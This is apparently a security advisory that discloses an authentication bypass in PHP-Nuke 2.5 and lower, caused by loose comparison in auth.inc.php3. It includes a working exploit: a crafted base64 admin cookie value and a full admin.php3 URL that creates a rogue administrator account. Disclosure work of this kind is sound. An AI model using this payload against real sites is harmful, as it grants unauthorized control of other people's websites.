Summary

Security vulnerability in PHP-Nuke, a news site administration package, allows
remote attacker to gain administrative access to the application. PHP-Nuke is
an open source, freely downloaded at:

http://linuxpreview.org/php-nuke.php3?op=english

Versions affected: ALL (current PHP-Nuke 2.5 or lower)

Details

Now let's take a look at how PHP-Nuke authenticates administrative accounts.
In the auth.inc.php3 file line 31:

$admintest = 0;

if(isset($admin)) {
  if(!IsSet($mainfile)) { include("mainfile.php3"); }
  $admin = base64_decode($admin);
  $admin = explode(":", $admin);
  $aid = "$admin[0]";
  $pwd = "$admin[1]";

  dbconnect();
  $result=mysql_query("select pwd from authors where aid='$aid'");
  if(!$result) {
        echo "Selection from database failed!";
        exit;
  } else {
    list($pass)=mysql_fetch_row($result);

    if($pass == $pwd) {
        $admintest = 1;
    }
  }
}

Here some checks are done for the $admin value. Since any variables, either
from cookies or forms (GET/POST) will be automatically made global to the
script by PHP, we may put our own $admin value to url. If $pwd (an element of
that "scrambled" $admin) does not match the value that corresponds to the
fetched row, the false authentication ($admintest = 0) is returned, otherwise
we'll be able to access any function in admin.php3. Sounds normal, until you
continue to read the following exploit.

The Exploit

The theory is simply to make $pass == $pwd. We see, the $pass value returned
from mysql_fetch_row() could be anything, or could be FALSE if there are no
more rows. So how about to make $pwd (string-type) and $pass (logical-type)
equally false? Yep, it satisfies the condition. The expression "if($pass ==
$pwd)" does only compares values, NOT the type. So, setting $pwd = "" (null)
will be EQUAL (though not identical) to the given FALSE value of $pass. 

Next is much simpler. You see, putting any string value NOT listed in the
authors database into the $aid will do for us. It gives the TRUE value of
mysql_query() and makes mysql_fetch_row() FALSE. So for example, crafting our
$admin value:

$aid = "blabla"; $pwd = "";
$admin = base64_encode("$aid:$pwd");

will give us "YmxhYmxhOg==". Using this value, we're now able to access all
functions in admin.php3. The following URL will add an account
"godbless:indonesia" into the authors database:

http://site//admin.php3?admin=YmxhYmxhOg%3D%3D&op=AddAuthor&add_aid=godbless&add_name=Godbless&add_pwd=indonesia&add_url=&add_email=fake@mail.me

Looking at the options, administrator can edit users, articles, topics,
banners, assign authors, etc.

Fabian Clone <fabianclone@usa.net>


____________________________________________________________________
Get free email and a permanent address at http://www.amexmail.com/?A=1